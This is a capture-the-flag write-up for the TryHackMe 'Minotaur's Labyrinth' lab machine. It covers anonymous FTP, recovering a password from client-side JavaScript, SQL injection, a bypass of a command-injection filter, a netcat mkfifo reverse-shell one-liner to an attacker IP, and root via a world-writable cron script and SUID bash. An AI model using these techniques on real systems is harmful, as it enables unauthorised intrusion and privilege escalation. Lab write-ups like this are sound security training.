CTF-Writeups/TryHackMe/Minotaur.md
2021-11-09 21:13:31 +05:00

6.5 KiB

TryHackMe-Minotaur's Labyrinth

NMAP


21/tcp   open  ftp      syn-ack ttl 63 ProFTPD                    
| ftp-anon: Anonymous FTP login allowed (FTP code 230)     
|_drwxr-xr-x   3 nobody   nogroup      4096 Jun 15 14:57 pub
80/tcp   open  http     syn-ack ttl 63 Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)                           
|_http-favicon: Unknown favicon MD5: C4AF3528B196E5954B638C13DDC75F2F
| http-methods:                                                           
|_  Supported Methods: GET HEAD POST OPTIONS                      
|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1
| http-title: Login                                                       
|_Requested resource was login.html                                       
443/tcp  open  ssl/http syn-ack ttl 63 Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
|_http-favicon: Unknown favicon MD5: BE43D692E85622C2A4B2B588A8F8E2A6
| http-methods:                                                           
|_  Supported Methods: GET HEAD POST OPTIONS                      
3306/tcp open  mysql?   syn-ack ttl 63                                    
| fingerprint-strings:                                                    
|   NULL:                                                                 
|_    Host 'ip-10-8-94-60.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server                                              
| mysql-info:                                                             
|_  MySQL Error: Host 'ip-10-8-94-60.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server                                   
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint 

PORT 21 (FTP)

Since anonymous login is enabled , we can login to ftp without the need of password

We can see a directory named pub and in that folder we'll see another hidden folder and a text file

From .secret we'll get two more text files

The message that those two files give us is

PORT 80 (HTTP)

On the webserver we can find a login page

If we check the source , we can fing login.js

Looking into the javascript file , we can see there are three arrays , a,b and c and the indexes of these 3 arrays are being combined to generate a password , so we need to just copy that part of the function and just print the concatenated value of string also to note that this is a password for Daedalus

a = ["0", "h", "?", "1", "v", "4", "r", "l", "0", "g"]
b = ["m", "w", "7", "j", "1", "e", "8", "l", "r", "a", "2"]
c = ["c", "k", "h", "p", "q", "9", "w", "v", "5", "p", "4"]
print (a[9]+b[10]+b[5]+c[8]+c[8]+c[1]+a[1]+a[5]+c[0]+c[1]+c[8]+b[8])

After submitting those credentials onto the login page we'll be granted access to the dashboard

If we scroll down a little , we can see that there are two options , either we search for people name from People table or we search for creature name from Creatures table , so let's run burp suite on this page and try some sqli

If we search the name "Daedalus" it will return us this user's id and password

So let's try a sqli 'or 1=1 --

And this gave us all the reuslts from Person's table, we can also check how many number of columns does this table have so we can also enumerate which version of mysql it's using.

If we try to arrange the records by 4th column it's going to give us an error meaning that there are only 3 columns in the table

We can crack the users password from crackstation website

On logging in with M!n0taur user we can see another tab in navigation bar

Foothold

On this page we can echo text but if we try to break out of the command to run bash commands we can't as it's using this regex (saw from the hint)

/[#!@%^&*()$_=\[\]\';,{}:>?~\\\\]/

This regex doesn't include | so we can echo id and pipe it's reuslt to bash

We can check if there's netcat (nc) available on this machine

To get a reverse shell , we need to base64 encode the netcat shell because there will be special characters in the payload so first we'll convert it to base64

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.94.60 2222 >/tmp/f

And we'll send it by piping it to base64 deocde and then to bash

Stabilizing the shell

We can check the echo.php file just to understand what was happening in the background

Also we can find database credentials from dbconnect.php

In user directory we can get our user flag

Privilege Escalation (root)

We can find a directory named timer in root directory /

#!/bin/bash                                                               
echo "dont fo...forge...ttt" >> /reminders/dontforget.txt

We know that everyone can read ,write and execute this bash script , so we can try to add id and save the result in a file ,and if we wait for the bash script to be executed we'll see the result of this command

Now what we can do is , make bash a SUID so when we execute bash it will be executed as root user and we will get shell as root user